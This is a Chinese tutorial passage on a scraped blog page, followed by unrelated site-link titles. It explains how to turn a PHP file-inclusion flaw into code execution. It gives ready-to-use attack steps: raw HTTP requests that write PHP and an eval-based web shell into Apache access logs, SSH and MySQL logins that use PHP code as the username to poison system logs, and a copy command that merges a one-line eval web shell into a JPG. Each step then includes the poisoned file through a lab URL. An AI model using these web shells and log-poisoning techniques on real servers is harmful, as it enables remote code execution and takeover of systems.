当前位置: 首页 > news >正文

网站 部署 域名网站的建设背景

网站 部署 域名,网站的建设背景,wap网站现在还有什么用,医院网站需要前置审批日志利用, 图片木马利用 一, 利用服务器日志 通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段. apache log: /opt/lampp/logs/access_log nginx log: /usr/local/nginx/logs/access.log 首先可以利用文件包含漏洞测试日志文件的内容是否可以显…

日志利用, 图片木马利用

一, 利用服务器日志

通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段.

apache log: /opt/lampp/logs/access_log
nginx log: /usr/local/nginx/logs/access.log 

首先可以利用文件包含漏洞测试日志文件的内容是否可以显示.
实际情况下日志的路径和名称都可能被修改, 需要其他手段获取.

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/access_log
http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/error_log

由于日志会记录请求的url, 如果发送的url中带有恶意代码, 那么日志文件access_log就会记录, 再使用文件包含漏洞包含日志文件来执行代码.

http://192.168.112.200/security/fileinc.php<?php phpinfo(); ?>

查看access_log日志:

[25/Oct/2023:09:57:53 +0800] "GET /security/fileinc.php%3C?php%20phpinfo();%20?%3E HTTP/1.1"

这里可以看到符号被浏览器转码了, 因此无法执行代码.
那么我们绕过浏览器来发送这个请求, 例如使用 burpsuite.

方式1: 不使用双引号, 需要去掉php空格.
GET /security/fileinc.php<?phpinfo();?> HTTP/1.1

查看access_log日志:

[25/Oct/2023:10:26:31 +0800] "GET /security/fileinc.php<?phpinfo();?> HTTP/1.1" 404 1033

这里看到代码已经顺利写入了, 那么利用文件包含来执行代码:

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/access_log
方式2: 使用双引号, 好处是可以包含更复杂的代码.
GET /security/fileinc.php"<?php eval($_POST['cmd']);?>" HTTP/1.1

查看access_log日志:

[25/Oct/2023:10:44:15 +0800] "GET /security/fileinc.php\"<?php eval($_POST['cmd']);?>\"" 400 961

利用漏洞:

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/access_logpost data: 
cmd=phpinfo();

二, 利用ssh或mysql的登录日志

1. linux默认的登录日志:
/var/log/secure

日志文件对其他用户有可读权限

正常登录:

ssh root@192.168.112.200

因为ssh的登录日志中会记录发送的用户名, 那么将用户名替换成恶意代码来登录:

ssh "<?phpinfo();?>"@192.168.112.200

查看日志:

Oct 25 11:15:13 mycentos sshd[16208]: Invalid user <?phpinfo();?> from 192.168.112.1 port 14605
Oct 25 11:15:13 mycentos sshd[16208]: input_userauth_request: invalid user <?phpinfo();?> [preauth]

这里可以看到代码已经注入到日志中了, 接下来利用文件包含漏洞执行代码:

http://192.168.112.200/security/fileinc.php?filename=/var/log/secure
2. mysql的登录日志

原理与ssh日志利用一样.

mysql日志默认是关闭的. 需要mysql日志是开启状态 /opt/lampp/etc/my.cnf:

general_log=ON
general_log_file=/opt/lampp/logs/mysql.log
log_output=file

日志文件对其他用户有可读权限

假设日志的路径:

/opt/lampp/logs/mysql.log

正常登录:

mysql -u root -p -h 192.168.112.200

将用户名替换成恶意代码:

mysql -u "<?phpinfo();?>" -p -h 192.168.112.200

利用文件包含漏洞执行代码:

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/mysql.log

3. 图片木马

准备图片和php文件, 使用cmd中的copy命令合并.

例如:
mm.php文件:

<?php @eval($_GET['cmd']); ?>

命令:

copy src.jpg/b + mm.php/a p_mm.jpg

以上命令将src.jpgmm.php合并, 生成图片p_mm.jpg

将木马图片上传到服务器, 利用文件包含漏洞执行代码:

http://192.168.112.200/security/fileinc.php?filename=image/p_mm.jpg&cmd=phpinfo();
http://www.yayakq.cn/news/341878/

相关文章:

  • 网站备案率定义一般通过血液传染的病有哪些
  • 巩义做网站汉狮网络wordpress主题公司
  • 网站建设的公司好做吗中文wordpress企业主题
  • 公司网站管理实验报告网站营销信息
  • 华大基因 网站建设wordpress设置登陆口
  • 广州网站建设方案维护wordpress实时交流插件
  • 福建省建设厅网站投诉固戍做网站的公司
  • 盘锦微商网站建设seo网络推广公司
  • 济南网站建设公百度经验登录入口
  • 外贸视频网站深圳定制展会时间表
  • 写文章的网站网站模板下载好之后如何安装
  • 创建网站收费网站开发摊销
  • 交易网站前期建设方案中企动力做的网站山西太原
  • asp.net微信网站为什么网站浏览不是做的那样
  • 商丘市做网站的公司教育网站前置审批系统
  • 网站开发工资多少钱微网站对比
  • 专业从事成都网站建设网站开发的发展历史及趋势
  • 做淘宝必备网站国贸做网站的公司
  • 建设银行官方网站认证wordpress 大屏模版
  • 可以做超链接或锚文本的网站有哪些低价网站建设优化公司
  • 大型网站建设规范ps怎么做网站导航
  • 南城网站建设公司装修设计公司有哪些
  • 福州网站建设专业公司临沧市建设局网站
  • 用英文介绍购物网站在线商城网站建设
  • 一个网站源代码概多大seo网站建设视频
  • 青岛做网站公司排名百度问问我要提问
  • 网站常用插件网站文件夹权限设置
  • 莱芜网站优化网页设计怎么把图片放在指定位置
  • 单页网站建设教程电子商务网站的特点
  • 国内永久在线免费建站程序员外包网站